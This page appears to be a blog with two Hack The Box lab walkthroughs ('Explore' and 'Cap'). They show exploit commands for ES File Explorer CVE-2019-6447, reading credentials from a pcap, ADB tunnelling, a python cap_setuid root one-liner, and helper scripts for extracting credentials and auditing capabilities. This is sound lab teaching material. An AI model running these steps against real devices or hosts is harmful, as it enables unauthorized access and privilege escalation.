The Dark Tech

Explore HTB Walkthrough

October 22, 2021 By BlackHammer

Enumeration


Nmap Scan

# Nmap 7.91 scan initiated Fri Oct 22 14:03:27 2021 as: nmap -A -sC -sV -p- -O -oN nmap 10.10.10.247
Nmap scan report for 10.10.10.247
Host is up (0.18s latency).
Not shown: 65531 closed ports
PORT      STATE    SERVICE VERSION
2222/tcp  open     ssh     (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey: 
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp  filtered freeciv
42135/tcp open     http    ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
Network Distance: 2 hops
Service Info: Device: phone

TRACEROUTE (using port 256/tcp)
HOP RTT       ADDRESS
1   185.07 ms 10.10.14.1
2   185.28 ms 10.10.10.247

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Oct 22 14:08:39 2021 -- 1 IP address (1 host up) scanned in 311.53 seconds

So here we have an SSH server on port 2222, a filtered port 5555 (which on Android is normally ADB), and two HTTP ports on 42135 and 59777. Nmap already reports the device as a phone, so let's check the HTTP ports first.

Port 42135 returns a Not Found error,

while 59777 returns a Forbidden error.


Foothold

So let's check for the ES File Explorer vulnerability. Searching Google for "ES File Explorer open port vulnerability" turns up an Exploit-DB post describing an arbitrary file read:

https://www.exploit-db.com/exploits/50070

Just grab that script and save it locally.

Listing the pictures on the device shows a creds.jpg:

└─# python3 exploit.py listPics 10.10.10.247 

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)

name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)

name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)

name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)

So let's go ahead and download it:

└─# python3 exploit.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

[+] Downloading file...
[+] Done. Saved as `out.dat`.

User

The script saves the data as out.dat, so just rename it to creds.jpg

and open it; the image contains SSH credentials:

kristi:[email protected]!
└─# ssh kristi@10.10.10.247 -p 2222
Password authentication
Password: 
:/ $ id
uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),9997(everybody),20076(u0_a76_cache),50076(all_a76) context=u:r:untrusted_app:s0:c76,c256,c512,c768
:/ $ whoami
u0_a76
2|:/ $ cd sdcard
:/sdcard $ ls
Alarms  DCIM     Movies Notifications Podcasts  backups   user.txt 
Android Download Music  Pictures      Ringtones dianxinos 
:/sdcard $ cat user.txt
f32017174c7c7e8f50c6da52891ae250

And here we have the user flag.


Root

As we saw earlier, port 5555 was filtered; on Android it is normally used by ADB, so let's create an SSH tunnel to forward it to our machine:

ssh kristi@10.10.10.247 -p 2222 -L 5555:127.0.0.1:5555
Password authentication
Password: 
:/ $

This tunnel makes port 5555 on our machine forward to 127.0.0.1:5555 on the phone, so the ADB service that is filtered from the outside becomes reachable through the SSH session. Now let's connect with adb:

adb connect 127.0.0.1:5555

After a successful connection you can list the device with

adb devices

and to get an interactive shell on it use

└─# adb -s 127.0.0.1:5555 shell
x86_64:/ $ id                                                                                                      
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
x86_64:/ $ su

:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:su:s0
:/ # whoami
root
:/ # cat /data/root.txt
f04fc82b6d49b41c9b08982be59338c5
:/ #                                                                                                                

Remember that we used su to switch from the ADB shell user to root.

Rooted..!!!


Cap HTB Walkthrough

October 1, 2021 By BlackHammer

Enumeration


Nmap Scan

Nmap scan report for 10.10.10.245
Host is up (0.19s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Fri, 01 Oct 2021 13:19:21 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Fri, 01 Oct 2021 13:19:14 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Fri, 01 Oct 2021 13:19:15 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, OPTIONS, HEAD
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27;
|     </body>
|_    </html>
|_http-server-header: gunicorn
|_http-title: Security Dashboard

Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 199/tcp)
HOP RTT       ADDRESS
1   186.65 ms 10.10.14.1
2   186.72 ms 10.10.10.245

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 156.38 seconds

In the above Nmap scan report you can see that ports 21, 22 and 80 are open. For FTP, anonymous login is not enabled and default credentials do not work, so we will proceed with the HTTP port.


User

If you browse to the HTTP page you land on a dashboard already logged in as the user Nathan.

When you navigate to the Security Snapshot page you can download packet capture files. If you change the single digit at the end of the URL, the other stored captures load as well, each showing a different packet count, so we will download the one with the most packets. You will find it at

http://10.10.10.245/data/0

Download the pcap file and open it in Wireshark, where you can see FTP traffic. It is an FTP session, and since FTP does not encrypt anything on the wire, the password is visible in plain text. So let's follow one of the FTP streams:

USER nathan
PASS Buck3tH4TF0RM3!
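The same extraction can be automated for captures you cannot open interactively. The following is an added example, not code from the walkthrough: a stdlib-only libpcap walker that pulls USER/PASS pairs out of cleartext FTP control traffic. The capture it reads is constructed inline to mirror the login stream above; the MAC addresses, IP addresses and client port are made up.

```python
import struct

def _frame(sport, dport, payload):
    """Build one Ethernet/IPv4/TCP frame around a payload (constructed test data)."""
    eth = b"\x02" * 6 + b"\x04" * 6 + b"\x08\x00"              # dst MAC, src MAC, IPv4
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 1, 0, 64, 6, 0,
                     bytes([192, 168, 196, 16]), bytes([192, 168, 196, 1]))
    return eth + ip + tcp + payload

# Constructed sample capture that mirrors the FTP login stream shown above;
# it is not the file downloaded from the dashboard.
_GLOBAL_HDR = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
SAMPLE_PCAP = _GLOBAL_HDR + b"".join(
    struct.pack("<IIII", 0, 0, len(f), len(f)) + f
    for f in (_frame(21, 54321, b"220 (vsFTPd 3.0.3)\r\n"),
              _frame(54321, 21, b"USER nathan\r\n"),
              _frame(21, 54321, b"331 Please specify the password.\r\n"),
              _frame(54321, 21, b"PASS Buck3tH4TF0RM3!\r\n"),
              _frame(21, 54321, b"230 Login successful.\r\n")))

def tcp_segments(pcap):
    """Yield (src_port, dst_port, payload) for every IPv4/TCP segment in a libpcap file."""
    order = "<" if struct.unpack_from("<I", pcap)[0] == 0xA1B2C3D4 else ">"
    off = 24                                           # skip the 24-byte global header
    while off + 16 <= len(pcap):
        incl_len = struct.unpack_from(order + "IIII", pcap, off)[2]
        frame, off = pcap[off + 16: off + 16 + incl_len], off + 16 + incl_len
        if len(frame) < 54 or frame[12:14] != b"\x08\x00":
            continue                                   # too short or not IPv4
        ip = frame[14:]
        if ip[9] != 6:
            continue                                   # not TCP
        tcp = ip[(ip[0] & 0x0F) * 4:]
        sport, dport = struct.unpack_from("!HH", tcp)
        yield sport, dport, tcp[(tcp[12] >> 4) * 4:]

def ftp_credentials(pcap, ftp_port=21):
    """Return (user, password) pairs sent in the clear on the FTP control channel."""
    found, user = [], None
    for sport, dport, payload in tcp_segments(pcap):
        if dport != ftp_port:
            continue                                   # only client -> server commands
        for line in payload.decode("latin-1").splitlines():
            verb, _, arg = line.partition(" ")
            if verb.upper() == "USER":
                user = arg
            elif verb.upper() == "PASS" and user is not None:
                found.append((user, arg))
    return found
```

Point ftp_credentials at the bytes of a real capture (open(path, "rb").read()) to get the same result Wireshark's Follow TCP Stream shows by hand.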

You can use these credentials to log in over SSH as user nathan (the FTP password is reused for SSH):

└─# ssh nathan@10.10.10.245
nathan@10.10.10.245's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 System information disabled due to load higher than 2.0

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Oct  1 14:14:56 2021 from 10.10.16.17
[email protected]:~$ 

Root

Here sudo is not available for any file and no ports are filtered by a firewall, so we will check for file capabilities with this command:

[email protected]:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

Now we can see that python3.8 carries cap_setuid in its effective, inheritable and permitted sets (the +eip), which lets the interpreter call setuid(0) without being root. So we can use the following one-liner to get root with python3:

[email protected]:~$ python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
[email protected]:~# id
uid=0(root) gid=1001(nathan) groups=1001(nathan)
[email protected]:~# 

And we have root access.
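A quick audit of getcap output makes this class of misconfiguration easy to spot across many hosts. The following is an added example, not part of the walkthrough: it parses getcap's text format (both the older "path = caps+eip" layout seen above and the newer "path caps=eip" layout) and flags dangerous capabilities, rating an interpreter such as python3.8 as critical. The capability and interpreter lists are my own choice of what to treat as dangerous; the sample input is the getcap output from above.

```python
import os
import re

# Capabilities that let a process escalate or bypass access control. An interpreter
# carrying one of them in its permitted set (the 'p' flag) is a local root for anyone
# who can run it, which is exactly the python3.8 finding above. Lists are my choice.
DANGEROUS_CAPS = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace",
                  "cap_dac_override", "cap_dac_read_search", "cap_sys_module", "cap_chown"}
INTERPRETERS = ("python", "perl", "ruby", "php", "node", "gdb", "vim")

# One clause of libcap's text form: capability names, an operator (+ = -), flag letters.
CLAUSE_RE = re.compile(r"([a-z_\d,]+)([=+-])([eip]*)")

def parse_getcap(output):
    """Map each path in getcap -r output to {capability: set of flags}; accepts the
    older 'path = caps+eip' layout and the newer 'path caps=eip' one."""
    result = {}
    for line in output.splitlines():
        parts = line.replace(" = ", " ", 1).split(None, 1)
        if len(parts) != 2:
            continue
        path, caps = parts[0], {}
        for names, op, flags in CLAUSE_RE.findall(parts[1]):
            for name in names.split(","):
                current = caps.get(name, set())
                caps[name] = current - set(flags) if op == "-" else current | set(flags)
        result[path] = caps
    return result

def audit_capabilities(output):
    """Return (path, capability, severity) for every file capability worth fixing."""
    findings = []
    for path, caps in parse_getcap(output).items():
        is_interp = os.path.basename(path).startswith(INTERPRETERS)
        for name, flags in caps.items():
            if name in DANGEROUS_CAPS and flags & {"e", "p"}:
                findings.append((path, name, "critical" if is_interp else "high"))
    return findings

# Sample input: the getcap output from the walkthrough above, verbatim.
SAMPLE_GETCAP = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""
```

Running audit_capabilities(SAMPLE_GETCAP) reports only python3.8, since cap_net_raw and cap_net_bind_service on the other binaries are their expected, low-risk capabilities; the fix is setcap -r on the interpreter.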


